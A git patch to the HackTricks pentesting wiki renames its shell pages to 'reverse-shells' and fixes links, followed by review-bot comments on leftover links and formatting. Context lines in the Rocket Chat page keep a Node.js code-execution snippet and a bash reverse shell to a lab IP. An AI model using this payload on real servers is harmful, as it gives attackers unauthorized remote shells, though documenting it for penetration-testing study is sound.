From 9afd316ac2119417bd56cb79968555821e08917a Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 31 Aug 2024 16:23:36 +0000 Subject: [PATCH] GITBOOK-4391: No subject --- SUMMARY.md | 10 +++++----- .../pentesting-methodology.md | 14 +++++++------- .../{shells => reverse-shells}/README.md | 0 .../{shells => reverse-shells}/full-ttys.md | 0 .../{shells => reverse-shells}/linux.md | 0 .../{shells => reverse-shells}/msfvenom.md | 0 .../{shells => reverse-shells}/windows.md | 0 .../pentesting-web/rocket-chat.md | 14 ++++++-------- 8 files changed, 18 insertions(+), 20 deletions(-) rename generic-methodologies-and-resources/{shells => reverse-shells}/README.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/full-ttys.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/linux.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/msfvenom.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/windows.md (100%) diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 16e5e427f..31d17d27a 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md 
@@ -1,8 +1,8 @@ # Pentesting Methodology {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -75,9 +75,9 @@ In some scenarios a **Brute-Force** could be useful to **compromise** a **servic If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): -### **7-** [**Getting Shell**](shells/) +### **7-** [**Getting Shell**](reverse-shells/) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/). +Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](reverse-shells/). Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ @@ -139,7 +139,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve #### **Exploiting** -* [**Basic Linux Exploiting**](broken-reference) +* [**Basic Linux Exploiting**](broken-reference/) * [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) 
@@ -158,8 +158,8 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/generic-methodologies-and-resources/shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md similarity index 100% rename from generic-methodologies-and-resources/shells/README.md rename to generic-methodologies-and-resources/reverse-shells/README.md diff --git a/generic-methodologies-and-resources/shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md similarity index 100% rename from generic-methodologies-and-resources/shells/full-ttys.md rename to generic-methodologies-and-resources/reverse-shells/full-ttys.md diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md similarity index 100% rename from generic-methodologies-and-resources/shells/linux.md rename to generic-methodologies-and-resources/reverse-shells/linux.md diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md similarity index 100% rename from generic-methodologies-and-resources/shells/msfvenom.md rename to generic-methodologies-and-resources/reverse-shells/msfvenom.md diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md similarity index 100% rename from generic-methodologies-and-resources/shells/windows.md rename to generic-methodologies-and-resources/reverse-shells/windows.md diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 74931bb3e..4602e96b9 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md 
@@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,7 +14,6 @@ Learn & practice GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ If you are admin inside Rocket Chat you can get RCE.
-* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like: +* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) like: ```javascript const require = console.log.constructor('return process.mainModule.require')(); @@ -55,9 +54,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -69,5 +69,3 @@ Learn & practice GCP Hacking: {% endhint %} -
-{% endhint %}
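Review bot: Only three files carry link updates for the `shells/` to `reverse-shells/` move (the diffstat lists `SUMMARY.md`, `pentesting-methodology.md` and `rocket-chat.md`), so any other page that still links to `generic-methodologies-and-resources/shells/...` will break once the five files are renamed. Search the repository for remaining references to the old path before merging. The subject "GITBOOK-4391: No subject" also gives no hint of the rename; a subject that names it would make the history searchable.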
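Review bot: In `pentesting-methodology.md`, hunk `@@ -139,7 +139,7 @@`, the "Basic Linux Exploiting" entry still targets the placeholder `broken-reference`; appending a slash (`broken-reference/`) does not make it resolve. Point it at the real page, as the two sibling entries do with their `../binary-exploitation/...` paths, or drop the entry until a target exists.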
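Review bot: The `{% hint style="success" %}` hunks at the top and bottom of `pentesting-methodology.md` and `rocket-chat.md` swap the two "Learn & practice" lines for text that reads identically, which looks like whitespace-only churn unrelated to the rename; leave it out or split it into its own commit so the rename diff stays reviewable. If these lines are touched anyway, `AWS Hacking:[**HackTricks` is missing the space after the colon that the GCP line has.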
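Review bot: In `rocket-chat.md`, hunk `@@ -29,7 +28,7 @@`, the rewritten bullet still reads "So lets get a"; since the line is being changed, correct it to "let's". The `#nodejs` fragment should keep resolving because `linux.md` is renamed at similarity index 100%, but the duplicated `{% endhint %}` removals in the neighbouring hunks (`@@ -14,7 +14,6 @@` and `@@ -69,5 +69,3 @@`) are a separate template fix and would be easier to audit in their own commit.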